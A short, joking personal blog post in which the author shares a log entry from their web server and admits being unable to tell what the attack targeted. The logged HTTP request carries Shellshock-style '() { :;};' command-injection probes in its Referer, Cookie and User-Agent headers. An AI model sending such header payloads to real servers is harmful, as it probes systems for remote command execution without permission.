Lain is omnipotent

Have you ever gotten that feel of shivers down your spine as you’re examining server logs and suddenly notice an exploit attempt where you have literally no idea what flaw the attacker was trying to expose. It happened to me yesterday and I’m still trying to decipher the malicious attack code shown below. So far I’ve gotten nowhere, and to make it worse, the server had no idea what the request was targeting either.

--cd718538-A--
[19/Feb/2016:23:33:46 +0100] VseYS... 208.100.26.237
--cd718538-B--
GET / HTTP/1.1
Host: Server IP
Referer: () { :;}; echo; echo "RUJJHVOPTKATNFL"
Cookie: () { :;}; echo; echo "RUJJHVOPTKATNFL"
User-Agent: () { :;}; echo; echo "RUJJHVOPTKATNFL"
() {: ;}; echo; echo "RUJJHVOPTKATNFL": () { :;}; echo; echo "RUJJHVOPTKATNFL"
Connection: close

I’ll be glued to my terminal watching every line of traffic data until I figure this one out…. or maybe not.

Serial Experiments Lain
Lain Iwakura

#numbshock

Thank you for reading!
Feel free to waste more time by subscribing to my RSS feed or check out the human-readable sitemap for more content.